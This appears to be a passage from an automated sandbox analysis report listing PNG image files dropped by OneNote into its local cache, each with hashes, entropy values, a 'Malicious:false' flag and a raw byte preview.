                                                                                                  SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000040.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):7374
                                                                                                  Entropy (8bit):7.955141875077912
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                  MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                  SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                  SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                  SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000041.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2210
                                                                                                  Entropy (8bit):7.86853667196985
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                  MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                  SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                  SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                  SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000042.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4847
                                                                                                  Entropy (8bit):7.950192613458318
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                  MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                  SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                  SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                  SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000043.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000044.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000045.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000046.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2232
                                                                                                  Entropy (8bit):7.837610270261933
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                  MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                  SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                  SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                  SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000047.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19235
                                                                                                  Entropy (8bit):7.944867159042578
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                  MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                  SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                  SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                  SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000048.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000049.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5386
                                                                                                  Entropy (8bit):7.943706538857394
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                  MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                  SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                  SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                  SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004B.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4081
                                                                                                  Entropy (8bit):7.943373267196131
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                  MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                  SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                  SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                  SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004C.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11332
                                                                                                  Entropy (8bit):7.9324721568775285
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                  MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                  SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                  SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                  SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004D.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2270
                                                                                                  Entropy (8bit):7.845368393313232
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                  MD5:6EFE6733E10E011FFDD6711B5F37C9E2
